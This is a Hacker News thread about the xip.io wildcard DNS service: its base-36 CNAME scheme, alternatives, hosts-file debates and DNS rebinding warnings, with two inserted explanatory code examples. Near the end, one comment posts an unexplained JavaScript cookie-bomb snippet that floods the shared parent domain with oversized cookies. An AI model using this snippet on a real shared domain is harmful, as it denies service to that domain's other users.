
Xip.io: Wildcard DNS for everyone - ozh
http://xip.io
======
sirn
I found its internal working quite interesting:

    
    
        $ dig 127.0.0.1.xip.io
        ;; ANSWER SECTION:
        127.0.0.1.xip.io.     403     IN     CNAME     9zlhb.xip.io.
        9zlhb.xip.io.         405     IN     A         127.0.0.1
    

Returning a CNAME pointing to some record? Apparently, 9zlhb is the base 36 of
the integer of 1.0.0.127.

    
    
        ip:      1.0.0.127
        dec:     16777343
        base 36: 9zlhb
    

I guess they decided to reverse the IP address to make the generated CNAME scale
better (in number of characters):

    
    
                    base 36   reverse base 36
        1.0.0.0     9ZLDS     1
        10.0.0.1    2RVXTT    9ZLE2
        127.0.0.1   Z8KFLT    9ZLHB
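
The encoding sirn describes, as an added example that is not part of the original comment and is not xip.io's own code: it reverses the octets, base-36 encodes the 32-bit value, and checks a CNAME target against the IP embedded in the query name. The function names and the `zone` parameter are illustrative assumptions.

```python
import ipaddress

ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz"

def to_base36(n: int) -> str:
    """Render a non-negative integer in lowercase base 36."""
    digits = ""
    while True:
        n, r = divmod(n, 36)
        digits = ALPHABET[r] + digits
        if n == 0:
            return digits

def encode_label(ip: str) -> str:
    """Reverse the octets (127.0.0.1 -> 1.0.0.127), then base-36 the 32-bit value."""
    packed = ipaddress.IPv4Address(ip).packed
    return to_base36(int.from_bytes(packed[::-1], "big"))

def decode_label(label: str) -> str:
    """Invert encode_label; reject anything that is not a 32-bit base-36 value."""
    label = label.lower()
    if not label or any(c not in ALPHABET for c in label):
        raise ValueError(f"not a base-36 label: {label!r}")
    n = int(label, 36)
    if n >= 2**32:
        raise ValueError(f"label exceeds 32 bits: {label!r}")
    return str(ipaddress.IPv4Address(n.to_bytes(4, "big")[::-1]))

def cname_matches(qname: str, cname: str, zone: str = "xip.io") -> bool:
    """Check that a CNAME target encodes the IP embedded in the query name."""
    suffix = "." + zone
    q, c = qname.rstrip(".").lower(), cname.rstrip(".").lower()
    if not (q.endswith(suffix) and c.endswith(suffix)):
        return False
    ip_labels = q[: -len(suffix)].split(".")[-4:]  # optional prefix labels are ignored
    try:
        embedded = str(ipaddress.IPv4Address(".".join(ip_labels)))
        return decode_label(c[: -len(suffix)]) == embedded
    except ValueError:
        return False

if __name__ == "__main__":
    for ip in ("1.0.0.0", "10.0.0.1", "127.0.0.1"):  # rows of the table above
        print(ip, encode_label(ip))
    print(cname_matches("127.0.0.1.xip.io.", "9zlhb.xip.io."))
```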

~~~
rs
There is [http://nip.io](http://nip.io) as well, which does resolution quite
straightforwardly:

    
    
       $ dig 127.0.0.1.nip.io
       ;; ANSWER SECTION:
       127.0.0.1.nip.io.	432000	IN	A	127.0.0.1

~~~
kmf
Hmm, this doesn't seem to be working for me in the same way that xip.io does.

One of my favorite features of Pow (also 37Signals, mentioned on xip.io) is
the ability to forward .dev domains to certain ports. For instance:

`echo 3000 >> ~/.pow/myapplication` gives you `myapplication.dev` as an alias
for `localhost:3000`.

xip.io seems to be able to figure that out -- myapplication.10.0.0.1.xip.io
will work, whereas myapplication.10.0.0.1.nip.io does not (just shows the Pow
page you would see for going to `localhost`).

Am I missing something here to get it to work with nip.io? I'm all for simpler
tools, but since the port functionality is 100% of what I use Pow for, xip.io
seems to be the way to go for now.

~~~
sirn
Pow has special support for the .xip.io domain[1]. If you add `export
POW_EXT_DOMAINS=10.0.0.1.nip.io pow` to `~/.powconfig` it should work[2]. I
haven't tried this myself though.

[1]:
[https://github.com/basecamp/pow/blob/master/lib/configuratio...](https://github.com/basecamp/pow/blob/master/lib/configuration.js#L77-78)

[2]:
[http://pow.cx/docs/configuration.html](http://pow.cx/docs/configuration.html)

------
Piskvorrr
Perhaps I am missing something - what problem does this solve? Instead of an
IPv4 address, you are now entering an (optional) prefix, the IPv4 address, and a
postfix ".xip.io". Where is the added value over entering the IP address
directly?

~~~
bluefinity
You can set up your web server to serve different applications on different
domains if you're working on multiple projects at the same time and don't want
to put them on different ports or use subdirectories.

Another use case I can see is for testing subdomain-based web apps where you
give each customer a subdomain (really just a wildcard dns record), e.g.
acme.myapp.com

~~~
Antwan
Why not just customize /etc/hosts then... You guys are relying too much on
3rd party tools without knowing what they do with your data and what they're
becoming in the future.

~~~
matthewmacleod
It's a DNS server. The only data they can get from you is what you're calling
the subdomains on your apps.

Yes, you could achieve the same functionality by editing /etc/hosts, but
that's a pain in the arse if you're rapidly switching between a set of
different sites, or if you want to access a coworker's machine in the same
way.

You guys are complaining too much about useful hacker-friendly tools from
well-known companies.

~~~
skywhopper
Editing /etc/hosts also requires root access, which becomes an issue if you're
running tests on a shared server that's locked down, rather than just on your
PC.

------
X-Istence
Do note, this will not work if you for example have unbound (or any other DNS
resolver on your network) set up to enforce privacy of certain addresses.

    
    
      private-address: 127.0.0.0/8
      private-address: 10.0.0.0/8
      private-address: 172.16.0.0/12
      private-address: 192.168.0.0/16
      private-address: 169.254.0.0/16
      private-address: fd00::/8
      private-address: fe80::/10
    

Here is the comment in the config file for the option:

    
    
      # Enforce privacy of these addresses. Strips them away from answers.
      # It may cause DNSSEC validation to additionally mark it as bogus.
      # Protects against 'DNS Rebinding' (uses browser as network proxy).
      # Only 'private-domain' and 'local-data' names are allowed to have
      # these private addresses. No default.
    

The reason I have this enabled is because it can help stop certain attacks
against the local network!

------
anton_gogolev
Kinda related: *.lvh.me ("lvh" as in "local virtual host") resolves to
127.0.0.1

~~~
ozh
Neat, even [http://lvh.me/](http://lvh.me/) resolves to localhost. True
generosity, you can't even know who is using the service without whois'ing the
domain

------
dsl
Heads up, these responses from external DNS servers may be blocked by some
recursive resolvers.

Allowing this on your network opens you up to
[http://en.wikipedia.org/wiki/DNS_rebinding](http://en.wikipedia.org/wiki/DNS_rebinding)
attacks.
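
The resolver-side filtering mentioned here and in X-Istence's unbound `private-address` comment above, as an added example (a simplified model of the behaviour that config comment describes, not unbound's code and not part of either comment). The sample answers are constructed, and `corp.example` is a hypothetical exempted zone standing in for a `private-domain` entry.

```python
import ipaddress

# Ranges from the private-address lines in the unbound config quoted above.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "fd00::/8", "fe80::/10")]

# Constructed sample answers (owner, type, rdata); corp.example is hypothetical.
SAMPLE_ANSWERS = [
    ("127.0.0.1.xip.io.", "CNAME", "9zlhb.xip.io."),
    ("9zlhb.xip.io.", "A", "127.0.0.1"),
    ("127.0.0.1.nip.io.", "A", "127.0.0.1"),
    ("myapp.10.0.0.1.nip.io.", "A", "10.0.0.1"),
    ("foo.lvh.me.", "A", "127.0.0.1"),
    ("www.example.com.", "A", "203.0.113.10"),
    ("nas.corp.example.", "A", "192.168.1.20"),
]

def is_private(addr):
    """True if the address falls inside any configured private range."""
    ip = ipaddress.ip_address(addr)
    return any(ip.version == net.version and ip in net for net in PRIVATE_NETS)

def under(name, domain):
    """True if name equals domain or is a subdomain of it."""
    name, domain = name.rstrip(".").lower(), domain.rstrip(".").lower()
    return name == domain or name.endswith("." + domain)

def filter_answers(answers, private_domains=()):
    """Split answers into (kept, stripped): address records in a private
    range are stripped unless the owner is under an exempted domain."""
    kept, stripped = [], []
    for owner, rtype, rdata in answers:
        private = rtype in ("A", "AAAA") and is_private(rdata)
        exempt = any(under(owner, d) for d in private_domains)
        (stripped if private and not exempt else kept).append((owner, rtype, rdata))
    return kept, stripped

if __name__ == "__main__":
    kept, stripped = filter_answers(SAMPLE_ANSWERS, private_domains=("corp.example",))
    for rec in stripped:
        print("STRIP", *rec)
    for rec in kept:
        print("KEEP ", *rec)
```

With the A record stripped, the xip.io CNAME is left pointing at a name with no address, which is why these names stop resolving behind such a resolver.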

------
sergiosgc
I always use my own resolver, with powerdns recursor, because some ISPs'
resolvers are dog slow. If you have such a setup, it's really simple to set
aside a tld for development.

On the powerdns recursor configuration, tell it to authoritatively serve a
tld:

    
    
      auth-zones=dev=/etc/powerdns/dev.zone
    

And then use a BIND style zone definition file. Something like:

    
    
      @       86400   IN      SOA     ns root 1 604800 86400 2419200 604800
              86400   IN      NS      ns
              86400   IN      A       127.0.0.1
      *       86400   IN      A       127.0.0.1
    
    

Now, domains such as "newshiningapp.dev" or "imgonatakeovertheworld.dev"
resolve to 127.0.0.1.

------
moonlighter
If you have a Mac and prefer a little GUI tool, Anvil is great:
[http://anvilformac.com](http://anvilformac.com)

It has built-in support for .xip.io domains; you can configure multiple sites
by pointing it at local directories and it'll serve them up using a built-in
POW server ([http://pow.cx](http://pow.cx), also from 37signals).

Great for example for remote testing on your local LAN without having to mess
with your HOSTS file.

------
larrybolt
I can see how this would be useful for testing across-device inside your home
network, but for resolving domains for development on my macbook I prefer
dnsmasq which I set to resolve the tld .dev to localhost. [1] I'm often
commuting by bus/train so I don't have a stable internet connection at all
times so I couldn't use xip.io anyway.

For php apps the only thing I need to do currently is make a symlink, and an
apache vhost entry makes it work [2], kinda like pow! Thinking about it, I
could even make that symlink step optional, or add passenger to the mix to
support nodejs/rack apps.

[1]:
[https://github.com/larrybolt/dotfiles/blob/master/homebrew/p...](https://github.com/larrybolt/dotfiles/blob/master/homebrew/packages/dnsmash.sh)

[2]:
[https://github.com/larrybolt/dotfiles/blob/master/apache/999...](https://github.com/larrybolt/dotfiles/blob/master/apache/999-vhosts)

~~~
fs111
I usually use zeroconf/avahi for that sort of thing.

~~~
klapinat0r
Would you mind elaborating (giving an example)?

I've toyed with bonjour spoofing before, but I always found querying was
_incredibly_ difficult, using _dns-sd_ , e.g.:

    
    
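       # Look up the service, extract its .local hostname, then stop dns-sd,
       # which keeps running until it is killed.
       HOST=`(dns-sd -L "Name of Machine" _http._tcp local |
         grep -o "at .* (interface" |
         grep -o "[a-zA-Z\-]\{1,\}\.local" &
       ); sleep 1 && pkill -f dns-sd`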
    

Obviously tailored specifically for that project, but I hope you catch my
drift. And add to that the port lookup.

I'm fairly certain I'm not using it as you do, so would you mind giving an
example of how you use MDNS for local dev testing?

------
omh
Unfortunately it looks like the entire xip.io domain is blacklisted as
"Reputation-Viruses" by the filtering service that we use.

I guess this is because it's been used by some bad guys already.

~~~
nobodyshere
Same here. Cisco filters don't like it either.

------
tedchs
I have never had this need, but if I did I would just create a wildcard under
my own domain:

    
    
      ; localhost
      *.local.example.com A 127.0.0.1
      ; e.g. if dev server is 10.0.0.1
      *.dev.example.com A 10.0.0.1
    

Hence, no 3rd party dependencies.

------
EmielMols
Used this often and it's a fine service. One feature request: it would be
great if they'd chip in a wildcard https certificate (and publish it including
private key), so it could be used for https on (local) development setups.
This would require supporting an additional naming scheme that only uses
single-level subdomains.

------
jops
A word of warning for any UK based BT customers: xip.io doesn't work on BT
Home Hub 5! I recently upgraded to the 5 from a Home Hub 3 (which it worked
fine on), but had to send it back because of this. The 'BT tech experts'
couldn't give an explanation. Has anyone else had the same issue?

~~~
janfoeh
No, but I had the same issue just last week working on premise at a customer.
Standard Fritzbox wifi AP, as far as I could see.

Switching to Google DNS (8.8.8.8) temporarily fixed it.

------
derefr
Dang; and here I was hoping it was going to be a dynamic-DNS host that also
issued free N-level wildcard SSL certificates (e.g. you.example.com,
*.you.example.com, *.*.you.example.com, etc.) That's one thing you won't get
from StartSSL.

------
pwenzel
I use VirtualhostX on my OSX machines, which includes automatic xip.io URLs.

[http://clickontyler.com/virtualhostx/](http://clickontyler.com/virtualhostx/)

Xip.io is enormously useful if you are testing on virtual machines or mobile
devices.

------
hackerboos
I know it solves both this and a slightly different problem but I think
[https://forwardhq.com](https://forwardhq.com) is a pretty cool, albeit not free,
solution.

~~~
larrybolt
This looks like what ngrok/localtunnel does, but free and open source.

~~~
hackerboos
This one supports SSL.

------
gdne
I just use charles (charlesproxy.com). Does everything this does and 15
bazillion other things too. Works with mobile devices and anything that can
set an HTTP proxy.

------
lewisflude
This is from 2012, when Basecamp were still 37signals.

~~~
babuskov
HN discussion at that time:

[https://news.ycombinator.com/item?id=4081591](https://news.ycombinator.com/item?id=4081591)

------
alexanderri

      function run() {
        var base_domain = document.domain.split('.').slice(-2).join('.');
        var pollution = Array(4000).join('x');
        for (var i = 1; i < 99; i++) {
          document.cookie = 'x' + i + '=' + pollution + ';Domain=' + base_domain + ';Path=/';
        }
      }

------
saddestcatever
I really like the service, however it desperately needs a better tutorial /
how-to for the first time user.

------
claudius
Is it just me or does anybody else also find it really annoying that the
blinking cursor there (behind the “everyone”) is not actually a cursor and one
cannot delete text with backspace?

------
alecsmart1
Am a little lost. Why can't we use the hosts file instead? I would understand if it
was complicated. But adding entries to hosts is super simple and definitely
requires no special knowledge.

~~~
Lutin
As binarymax mentioned[1], it's very useful when you want to test on multiple
devices where editing the host file would be undesired or not possible. This
includes mobile devices or computers that are not your own or that you don't
have administrative access to. It's also easier to just share a link instead
of asking people to change their hosts file just to test a part of a site.

[1]
[https://news.ycombinator.com/item?id=7732756](https://news.ycombinator.com/item?id=7732756)

------
nXqd
Does it work with a local IP address with a port?

~~~
wprl
It's just DNS, which doesn't bring port into the picture. A domain name
resolves to an IP address separately from whatever ports the server at that
address might listen on.

~~~
fulafel
SRV records do ports.

------
moondev
This is great.

------
cwh
or just configure your environment correctly.

------
anilyeni
I can only use it somewhere I cannot use an IP address directly but a domain name. I
couldn't remember any configuration file like that.

